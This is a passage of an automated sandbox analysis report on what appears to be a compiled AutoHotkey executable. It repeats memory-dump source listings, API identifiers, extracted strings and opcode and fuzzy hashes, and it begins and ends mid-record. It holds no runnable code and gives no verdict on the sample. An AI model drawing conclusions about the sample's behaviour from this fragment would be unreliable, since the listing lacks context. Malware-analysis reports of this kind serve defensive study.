                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$DataFormatName
                                                                                                                                                                              • String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
                                                                                                                                                                              • API String ID: 3172747766-1844231336
                                                                                                                                                                              • Opcode ID: 10a3594f36a10c6e50d722cadf51c313105cf668cbefeb4640153f92544ecffe
                                                                                                                                                                              • Instruction ID: f30d53cce221a6165054bc89aa4d91e157422b91ef0dac50e24ac31f33467884
                                                                                                                                                                              • Opcode Fuzzy Hash: 10a3594f36a10c6e50d722cadf51c313105cf668cbefeb4640153f92544ecffe
                                                                                                                                                                              • Instruction Fuzzy Hash: E8310CB2314B4191EB26EB26E4903EA63B4B75D3C5F884125BB89875F5EB7CC749CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: <<>>$MZ@$Out of memory.
                                                                                                                                                                              • API String ID: 0-2842364066
                                                                                                                                                                              • Opcode ID: 076de97a5c0cf4cf5250175bd43bf1b50c968d1a4638b61b38f0e5ba925c2115
                                                                                                                                                                              • Instruction ID: c9b1d4a3735362655cb907219d159726a00fd82166513946a42083a7c82d6126
                                                                                                                                                                              • Opcode Fuzzy Hash: 076de97a5c0cf4cf5250175bd43bf1b50c968d1a4638b61b38f0e5ba925c2115
                                                                                                                                                                              • Instruction Fuzzy Hash: B432B172604A8485FB77DB26A4443EE27A0E75DBC4F4A4926FF8A476F5EB38C845C304
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AvailableClipboardFormat
                                                                                                                                                                              • String ID: <<>>$MZ@
                                                                                                                                                                              • API String ID: 778505046-2574836979
                                                                                                                                                                              • Opcode ID: d95a6ca896a2b1736a47bead4f00e92cf35d4da6ba2213ad5efc882ebce02ace
                                                                                                                                                                              • Instruction ID: d0839c6ae3987ec872c6a0af2b094ea4265d98d06deeabd23d3f59f4bbb9f004
                                                                                                                                                                              • Opcode Fuzzy Hash: d95a6ca896a2b1736a47bead4f00e92cf35d4da6ba2213ad5efc882ebce02ace
                                                                                                                                                                              • Instruction Fuzzy Hash: 97E1CF7260468186EB67DFA7A4443EB27A1F74DBC8F584116FB8A0B6F5DB38E845C300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcquireLock$AddressCriticalHandleLeaveModuleProcSectionVersion
                                                                                                                                                                              • String ID: %u.%u.%u$10.0.17134$RtlGetVersion$ntdll.dll
                                                                                                                                                                              • API String ID: 336819936-3240200435
                                                                                                                                                                              • Opcode ID: c0fe5eb6ce6e183f4d858b32f5f7711c36935ff7494b074c367067881845237c
                                                                                                                                                                              • Instruction ID: 937256b28841e7a42b9e9dd22dc710e2f8d7dd63825e0ab74ea82bdd73688669
                                                                                                                                                                              • Opcode Fuzzy Hash: c0fe5eb6ce6e183f4d858b32f5f7711c36935ff7494b074c367067881845237c
                                                                                                                                                                              • Instruction Fuzzy Hash: F54163B07056C1DAFB17EB26AC553D53BA0A76EB48F880019D78A4BFB1DA7DC444C711
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                              • API String ID: 107509674-3733053543
                                                                                                                                                                              • Opcode ID: ebb33053a39e8caa69871b8061676876d6652616186f994362947d906779d1bf
                                                                                                                                                                              • Instruction ID: 44545db6cc0edc7d828686ca3ca6d072109201a590c612806124eb485c3094dc
                                                                                                                                                                              • Opcode Fuzzy Hash: ebb33053a39e8caa69871b8061676876d6652616186f994362947d906779d1bf
                                                                                                                                                                              • Instruction Fuzzy Hash: 1E018F71219F4082EB598B62BC483DA63A1FB8C7D4F409029B64E83A74DF3CC559CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountErrorLastTick$CloseHandleInfoMessagePeek
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 405775314-0
                                                                                                                                                                              • Opcode ID: 9d1b76a5238fe08a495902ebcd8fde1a211dd5ee8ddeaec9681cb01d312a68a8
                                                                                                                                                                              • Instruction ID: 0c06daa4d14921b295ff1b46a6fd93cf71192050cbce9541b32724e5790d4986
                                                                                                                                                                              • Opcode Fuzzy Hash: 9d1b76a5238fe08a495902ebcd8fde1a211dd5ee8ddeaec9681cb01d312a68a8
                                                                                                                                                                              • Instruction Fuzzy Hash: 7EA16F72224B8086E7A6DB16E450BDA7760F789BE4F515325FBAA43BF4DB38C445CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BitsObjectSelect$CompatibleCreateDeleteEntriesPaletteSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3388690935-0
                                                                                                                                                                              • Opcode ID: a60b3e6ee84313472ddd66b0129db10100318cab71b937aa562ed35eaf49d34d
                                                                                                                                                                              • Instruction ID: 5503a965b5104343ae0485ef54026f43cb5ed52a350064c8cac1dfdd8c2144f3
                                                                                                                                                                              • Opcode Fuzzy Hash: a60b3e6ee84313472ddd66b0129db10100318cab71b937aa562ed35eaf49d34d
                                                                                                                                                                              • Instruction Fuzzy Hash: E561BF36310B908AE766CF26E8403DA77A0F78DBC8F858425EF4987BA4DB38C605C714
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: %sGui$AutoHotkeyGUI$Close$ContextMenu$DropFiles$Escape$Gui$Size
                                                                                                                                                                              • API String ID: 0-89913139
                                                                                                                                                                              • Opcode ID: 5183c16f14deb1d988a4e9841c19a6c77b196675d88c3f782d8c9105eb201564
                                                                                                                                                                              • Instruction ID: 59664ed155b6e7b7b2eceb07a5a6dbbe70bf1e68645500b177da2aa0474ae0e8
                                                                                                                                                                              • Opcode Fuzzy Hash: 5183c16f14deb1d988a4e9841c19a6c77b196675d88c3f782d8c9105eb201564
                                                                                                                                                                              • Instruction Fuzzy Hash: A9B1B172B05A8086EF229F13E4403E977B1FB5DBC4F588A26EB8C476A5EB38C504C751
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $ $.$.
                                                                                                                                                                              • API String ID: 0-1066414380
                                                                                                                                                                              • Opcode ID: 3da75f014bbb5f0127d3aaf7e9bf2eef44cc37bfb74c95875e0aeba415723dd9
                                                                                                                                                                              • Instruction ID: 6e007318a669670e565c3a342c47464d97f2f52040c45d9920ac776f0f82bb82
                                                                                                                                                                              • Opcode Fuzzy Hash: 3da75f014bbb5f0127d3aaf7e9bf2eef44cc37bfb74c95875e0aeba415723dd9
                                                                                                                                                                              • Instruction Fuzzy Hash: C202B7B1B0665582FAB7AB1794613FB63D1A79CBC0F444022FF8A577F5EA78C8819700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Can't Change Setting$Can't Get Current Setting$Can't Open Specified Mixer$Component Doesn't Support This Control Type$Mixer Doesn't Have That Many of That Component Type$Mixer Doesn't Support This Component Type$Off
                                                                                                                                                                              • API String ID: 0-3049241934
                                                                                                                                                                              • Opcode ID: cca815ec09b2b1fb2e3224eb0b6e27d4f8cf90be339723837cd9cead51612c30
                                                                                                                                                                              • Instruction ID: 87da850fe830252805f43a70ea0b430b860ff1b57711d8c44b57f2f9f7bfcd1e
                                                                                                                                                                              • Opcode Fuzzy Hash: cca815ec09b2b1fb2e3224eb0b6e27d4f8cf90be339723837cd9cead51612c30
                                                                                                                                                                              • Instruction Fuzzy Hash: 2522C032600AC489E7238F3795403E927A1FB5E7E8F1A9312BB5927BB5DB38D595C340
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unicode$KeyboardLayoutVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3037800794-0
                                                                                                                                                                              • Opcode ID: 545c2ed9783a131bcb7f8cbf544cc439cd2fa4d501c49918ff8a630af7c3fa10
                                                                                                                                                                              • Instruction ID: d27c4c934f0849a16ef3496ffb96d3ad619c632090646d7cd05e72c0058309ce
                                                                                                                                                                              • Opcode Fuzzy Hash: 545c2ed9783a131bcb7f8cbf544cc439cd2fa4d501c49918ff8a630af7c3fa10
                                                                                                                                                                              • Instruction Fuzzy Hash: 35414C72508AD486E3769F16F4443DAB7A0F788785F44411AEBC947AA9DF3DC149CB10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                              • Opcode ID: 06cdc858aad4cf909cf5e95ad4fddc294eb3d95f635c3eb613cd826690686522
                                                                                                                                                                              • Instruction ID: b3f56b7173bca9671eda89dbce58cc92b61b35eb7190f44ae6c12861a4ffeb10
                                                                                                                                                                              • Opcode Fuzzy Hash: 06cdc858aad4cf909cf5e95ad4fddc294eb3d95f635c3eb613cd826690686522
                                                                                                                                                                              • Instruction Fuzzy Hash: 86311A36214F8086EB658F66E8407DE73A4F788798F540126FB9D43BA9EF38C655CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AvailableClipboardFormat
                                                                                                                                                                              • String ID: <<>>$MZ@$U
                                                                                                                                                                              • API String ID: 778505046-868637509
                                                                                                                                                                              • Opcode ID: f4b9dff0f170fe9ec079d0794f8b86e7df144f8d32168f8f38e1e292ed6fcbd6
                                                                                                                                                                              • Instruction ID: 137e9c4e5f174d3e5e5af7b4d218959abfcc626c12c00546a57ed91e3f3b499f
                                                                                                                                                                              • Opcode Fuzzy Hash: f4b9dff0f170fe9ec079d0794f8b86e7df144f8d32168f8f38e1e292ed6fcbd6
                                                                                                                                                                              • Instruction Fuzzy Hash: CFA1CE72600A0486FB66DF37E4853EE27A1A74DBD4F444621FB5A076F6EB3AC885C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MZ@$Out of memory.
                                                                                                                                                                              • API String ID: 0-1491408499
                                                                                                                                                                              • Opcode ID: c9dea6349dfa1e5fab74dc0d412c35d9cfb7527401d25656f7b3b9419ffb4b4e
                                                                                                                                                                              • Instruction ID: 67c88ff453b93e935b8abb28dd75eb3ec4beebdfbb494fd3acfcff4b6f14abf7
                                                                                                                                                                              • Opcode Fuzzy Hash: c9dea6349dfa1e5fab74dc0d412c35d9cfb7527401d25656f7b3b9419ffb4b4e
                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED2CD72200B808AEB66CF26D8587E937A2F748BD8F654A16FF5D177A4DB38C945C340
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $ $ $ $.$.
                                                                                                                                                                              • API String ID: 0-4137459148
                                                                                                                                                                              • Opcode ID: 9dcc52a7f6d0ae29b9a3b4466630d3489e0c432975c7d08f3329c1edbabf0bc4
                                                                                                                                                                              • Instruction ID: 4f559b980685476830d19910aa2c99eb4d7c20ec81cb7793d9df23fdd4db4838
                                                                                                                                                                              • Opcode Fuzzy Hash: 9dcc52a7f6d0ae29b9a3b4466630d3489e0c432975c7d08f3329c1edbabf0bc4
                                                                                                                                                                              • Instruction Fuzzy Hash: 07D1D576B0461146FB6AA72B85553FD32D2AB5D7C0F54812BFF4A976F4EB38CC829200
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick
                                                                                                                                                                              • String ID: <<>>
                                                                                                                                                                              • API String ID: 536389180-913080871
                                                                                                                                                                              • Opcode ID: 51cc0cfdcc3071d0e90c07f04d7386bf2dfe33e40b507f06cc523a7a264dd36c
                                                                                                                                                                              • Instruction ID: 56b92699cea23e04eb6d3cbab2e5107e25d794262e0459c24be76757f0e5aa57
                                                                                                                                                                              • Opcode Fuzzy Hash: 51cc0cfdcc3071d0e90c07f04d7386bf2dfe33e40b507f06cc523a7a264dd36c
